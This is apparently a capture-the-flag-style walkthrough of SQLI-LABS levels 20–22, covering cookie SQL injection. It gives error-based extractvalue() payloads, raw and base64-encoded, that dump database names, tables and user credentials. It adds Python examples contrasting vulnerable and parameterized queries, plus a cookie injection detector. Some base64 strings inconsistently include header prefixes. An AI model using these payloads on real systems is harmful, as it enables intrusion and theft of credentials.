SQLI-LABS Less-20 to Less-22

Cookies

Cookie injection works a little differently from the other header injections.

Cookie: the browser sends its cookie along with every request to the server, and the server sets cookies on the browser; the Cookie header is where that value is placed. For example: Cookie: user=admin

Source code: if a cookie is set, the following statement is executed:

and this one will not execute:

Less-20

Log in to an account, then capture the request with Hackbar's LOAD command or Burp Suite.

Closing character: '$cookee'

Query the current database:

Dumb' or extractvalue(1,concat(0x7e,database())) #
(The uname value, Dumb here, can be anything; it does not affect extractvalue().)

Query the tables under the current database:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

Query the fields of the current table:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

Query data:

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
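To show why a cookie value in this position is dangerous, here is an added example (not the lab's PHP source) that models the Less-20 lookup in Python with an in-memory SQLite table standing in for security.users, and contrasts string concatenation with a bound parameter using the first payload above. The table layout, its placeholder row and the LIMIT 0,1 shape are assumptions.

```python
import sqlite3

# Payload taken from the Less-20 walkthrough above.
PAGE_PAYLOAD = "Dumb' or extractvalue(1,concat(0x7e,database())) #"

def make_db():
    # Constructed in-memory stand-in for the lab's security.users table
    # (assumed columns; the row values are placeholders, not the lab's data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('Dumb', 'constructed-pw')")
    return con

def lookup_vulnerable(con, cookie_uname):
    # The pattern the write-up reports: the cookie is pasted between single quotes,
    # so a quote inside the cookie ends the string and the rest becomes SQL.
    sql = "SELECT username FROM users WHERE username='%s' LIMIT 0,1" % cookie_uname
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The cookie rewrote the statement. SQLite rejects it here; MySQL would
        # evaluate the injected extractvalue() call and leak data in its error text.
        return ("error", str(exc))
    return ("ok", row[0] if row else None)

def lookup_hardened(con, cookie_uname):
    # Bound parameter: the whole cookie value is compared as data, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username=? LIMIT 0,1"
    row = con.execute(sql, (cookie_uname,)).fetchone()
    return ("ok", row[0] if row else None)

if __name__ == "__main__":
    con = make_db()
    for uname in ("Dumb", PAGE_PAYLOAD):
        print(lookup_vulnerable(con, uname), lookup_hardened(con, uname))
```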

Less-21

The source calls base64_decode() on the cookie value, so the cookie must be base64-decoded before it reaches the query.

Log in to an account and load the request with Hackbar's LOAD command. The cookie value taken from the page is URL-encoded (the trailing = appears as %3D): URL-decode it first, then base64-decode the result, which gives Dumb.

Closing character: ('$uname')

Query the current database:

Dumb') or extractvalue(1,concat(0x7e,database())) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj

Query the table of the database:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj

Query the fields of the current table:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==

Query data:

Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj

dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=

Less-22

The closing character has changed.

Log in to an account and capture the request with Hackbar's LOAD command or Burp Suite. The cookie value is RHVtYg== with its = URL-encoded (%3D); base64-decoding it gives Dumb.

The page jumps back to Less-21 here; only the file name in the address bar has changed to Less-22.

Closing character: "$cookee1"

Query the current database:

Dumb" or extractvalue(1,concat(0x7e,database())) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==

Query the tables of the current database:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==

Query the fields of the current table:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj

Query data:

Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj

RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==
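From the detection side, the three levels share one lesson: a filter that inspects only the raw Cookie header misses Less-21/22 entirely, because the payload is hidden under base64 (and its = under URL encoding). The following added example (mine, not part of the write-up or of sqli-labs) parses a Cookie header, applies the same decoding layers the lab applies, and flags the payload shapes used above; the sample headers and the PHPSESSID value are constructed.

```python
import base64, re
from urllib.parse import unquote

# Indicators drawn from the payload shapes in this write-up: a quote (optionally
# followed by ')') closing the string before OR, extractvalue(), information_schema,
# and a trailing '#' that comments out the rest of the statement.
INJECTION_RE = re.compile(
    r"""(['"]\)?\s*or\b|extractvalue\s*\(|information_schema|#\s*$)""", re.IGNORECASE)

def decode_layers(value):
    """URL-decode, then try base64 (the Less-21/22 variant); only printable
    ASCII counts as a base64 layer, so a plain value like 'Dumb' is not misread."""
    layers = [unquote(value)]
    try:
        text = base64.b64decode(layers[0], validate=True).decode("ascii")
        if text and text.isprintable():
            layers.append(text)
    except ValueError:  # binascii.Error (bad base64) is a ValueError too
        pass
    return layers

def parse_cookie_header(header):
    pairs = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs[name] = value
    return pairs

def suspicious_cookies(header):
    """{cookie name: (depth, decoded text)} per matching value; depth 1 means
    the payload was only visible after base64 decoding."""
    hits = {}
    for name, value in parse_cookie_header(header).items():
        for depth, text in enumerate(decode_layers(value)):
            if INJECTION_RE.search(text):
                hits[name] = (depth, text)
                break
    return hits

# Constructed sample headers; the payloads are the ones used above (Less-20 raw,
# Less-21 base64). PHPSESSID=abc123 is a placeholder session id.
SAMPLES = {
    "benign": "uname=Dumb; PHPSESSID=abc123",
    "benign_b64": "uname=RHVtYg%3D%3D",
    "less20_raw": "uname=Dumb' or extractvalue(1,concat(0x7e,database())) #",
    "less21_b64": "uname=" + base64.b64encode(
        b"Dumb') or extractvalue(1,concat(0x7e,database())) #").decode(),
}
```

Run `suspicious_cookies(SAMPLES["less21_b64"])` to see the hit reported at depth 1, while the two benign headers return an empty dict.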
